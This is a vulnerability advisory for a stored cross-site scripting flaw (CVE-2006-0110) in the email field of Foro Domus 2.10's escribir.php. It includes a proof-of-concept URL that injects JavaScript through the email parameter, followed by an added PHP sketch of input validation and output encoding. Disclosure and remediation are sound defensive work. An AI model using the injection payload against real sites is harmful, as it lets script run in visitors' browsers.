email XSS Vulnerability in Foro Domus
Summary
- Vulnerability: email XSS Vulnerability in Foro Domus
- Discovered: 2006.01.06
- Last Update: 0 n/a
- ID: EV0016
- CVE: CVE-2006-0110
- Risk Level: low
- Type: Cross Site Scripting
- Status: Unpatched
- Vendor: n/a
- Vulnerable Software: Foro Domus (http://domus.sourceforge.net/)
- Version: 2.10
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
A cross-site scripting vulnerability was found in the Foro Domus (http://domus.sourceforge.net/) script.
Vulnerable script: escribir.php
The variable $email isn't properly sanitized. This can be used to post arbitrary script code, which will be executed in the browser of every visitor.
PoC/Exploit
Example URL:
http://host/domus/escribir.php? domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@';%20alert(123);%20var%20dss='h.co&asunto=blabla&texto=anytext&accion=enviar
Solution
A solution for "email XSS Vulnerability in Foro Domus" is not available. Check the vendor's website for updates.
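With no vendor fix, the handling that $email lacks is server-side validation on input plus context-specific encoding on output; the sketch below shows both in PHP. It is an added example, not Foro Domus code or part of the original advisory. The function names are hypothetical, and it assumes the stored address is later written into HTML text or a quoted JavaScript string, which the advisory does not show.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; the advisory does not show the code of escribir.php.

/** Return the address if it is syntactically valid, otherwise null. */
function clean_email(string $raw): ?string
{
    $raw = trim($raw);
    if (strlen($raw) > 254) {          // practical upper bound for an address
        return null;
    }
    $ok = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

/** Encode for HTML text or a quoted attribute value. */
function html_out(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Encode as a complete JavaScript string literal that is safe inside <script>. */
function js_out(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    return json_encode($s, $flags | JSON_THROW_ON_ERROR);
}

// Constructed inputs: the advisory's email value after URL decoding, and a
// legitimate address whose local part contains an apostrophe.
$samples = [
    "e@'; alert(123); var dss='h.co",
    "o'brien@example.com",
];

foreach ($samples as $raw) {
    $email = clean_email($raw);
    if ($email === null) {
        // Validation failed: refuse the post instead of storing the value.
        echo 'rejected: ', html_out($raw), "\n";
        continue;
    }
    // A valid address can still contain a quote, so encode at every output.
    echo 'html: <span class="email">', html_out($email), "</span>\n";
    echo 'js:   var addr = ', js_out($email), ";\n";
}
```

The second sample passes validation yet still carries a quote character, which is why the output encoders are needed even when input validation is in place.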